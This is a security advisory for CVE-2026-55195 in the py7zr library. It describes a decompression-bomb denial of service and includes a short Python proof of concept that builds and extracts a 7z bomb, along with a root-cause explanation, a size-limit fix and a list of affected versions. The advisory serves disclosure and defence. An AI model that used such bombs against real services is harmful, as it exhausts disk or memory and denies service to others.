GHSA-gjrg-mpp7-g774

Source

https://github.com/advisories/GHSA-gjrg-mpp7-g774

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-gjrg-mpp7-g774/GHSA-gjrg-mpp7-g774.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-gjrg-mpp7-g774

Aliases

CVE-2026-55195

Published

2026-06-19T21:16:29Z

Modified

2026-06-19T21:30:08.815821744Z

Severity

6.9 (Medium) CVSS_V4 - CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator

Summary

py7zr: Decompression bomb (zip bomb) denial of service via unchecked extraction size

Details

py7zr's Worker.decompress() extracts archive entries without tracking total decompressed size. A crafted .7z file can exhaust disk or memory before the extraction completes.

Measured: 15.6 KB archive → 100 MB output (6,556:1 ratio).

Proof of concept:

import py7zr, tempfile, os

# create bomb: compress 100MB of zeros into ~15KB
bomb_path = tempfile.mktemp(suffix='.7z')
with py7zr.SevenZipFile(bomb_path, 'w') as z:
    import io
    z.writef(io.BytesIO(b'\x00' * 100 * 1024 * 1024), 'bomb.bin')

print(f'archive size: {os.path.getsize(bomb_path):,} bytes')

# extract — no size check
with py7zr.SevenZipFile(bomb_path, 'r') as z:
    z.extractall(path=tempfile.mkdtemp())

print('extracted 100 MB from ~15 KB archive')

Root cause: Worker.decompress() in py7zr/worker.py writes decompressed data directly to disk without a running total or configurable size limit. There is no equivalent of Python's zipfile max_size parameter.

Fix: track cumulative decompressed bytes and raise before writing if a limit is exceeded:

MAX_EXTRACT_SIZE = 2 * 1024 ** 3  # 2 GB default, configurable

total = 0
for chunk in decompressed_chunks:
    total += len(chunk)
    if total > MAX_EXTRACT_SIZE:
        raise py7zr.exceptions.DecompressionBombError(
            f'Extraction aborted: decompressed size exceeded {MAX_EXTRACT_SIZE} bytes'
        )
    outfile.write(chunk)

Tested on py7zr 0.22.0, Python 3.12, Ubuntu 22.04.

Database specific

{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-06-19T21:16:29Z",
    "github_reviewed": true,
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-409"
    ]
}

References

Affected packages

PyPI / py7zr

Package

Name: py7zr; View open source insights on deps.dev
Purl: pkg:pypi/py7zr

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.1.3

Affected versions

0.*

0.0.3

0.0.4

0.0.5

0.0.6

0.0.7

0.0.8

0.1.0

0.1.1

0.1.2

0.1.3

0.1.4

0.1.5

0.1.6

0.2.0

0.3

0.3.1

0.3.2

0.3.3

0.3.4

0.3.5

0.4a1

0.4a2

0.4b1

0.4

0.4.1

0.4.3

0.4.4

0.5a3

0.5a4

0.5b1

0.5b2

0.5b3

0.5b4

0.5b5

0.5b6

0.5rc2

0.5rc3

0.5

0.5.2

0.5.3

0.5.4

0.5.5

0.6a1

0.6a2

0.6b1

0.6b2

0.6b3

0.6b4

0.6b5

0.6b6

0.6b7

0.6b8

0.6rc0

0.6

0.7.0b1

0.7.0b2

0.7.0b3

0.7.0

0.7.1

0.7.2

0.7.3

0.7.4

0.8.0a1

0.8.0a2

0.8.0a3

0.8.0b1

0.8.0b2

0.8.0b3

0.8.0b4

0.8.0b5

0.8.0b6

0.8.0b7

0.8.0b8

0.8.0

0.8.1

0.8.2

0.8.3

0.8.4

0.8.5

0.9.0a1

0.9.0a2

0.9.0b1

0.9.0b2

0.9.0b3

0.9.0

0.9.1

0.9.2

0.9.3

0.9.4

0.9.5

0.9.7

0.9.8

0.9.9

0.9.10

0.10.0a1

0.10.0a2

0.10.0a3

0.10.0a4

0.10.0a5

0.10.0a6

0.10.0b1

0.10.0b3

0.10.0

0.10.1

0.10.2

0.11.0a1

0.11.0b1

0.11.0b2

0.11.0b3

0.11.0

0.11.1

0.11.2

0.11.3

0.12.0

0.13.0

0.13.1

0.14.0

0.14.1

0.15.0

0.15.1

0.15.2

0.16.0

0.16.1

0.16.2

0.16.3

0.16.4

0.17.0

0.17.1

0.17.2

0.17.3

0.17.4

0.18.0

0.18.1

0.18.3

0.18.4

0.18.5

0.18.6

0.18.7

0.18.9

0.18.10

0.18.11

0.18.12

0.19.0

0.19.1

0.19.2

0.20.0

0.20.1

0.20.2

0.20.4

0.20.5

0.20.6

0.20.7

0.20.8

0.21.0

0.21.1

0.22.0

1.*

1.0.0rc1

1.0.0rc2

1.0.0rc3

1.0.0

1.1.0rc2

1.1.0rc4

1.1.0

1.1.2

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-gjrg-mpp7-g774/GHSA-gjrg-mpp7-g774.json"

last_known_affected_version_range

"<= 1.1.2"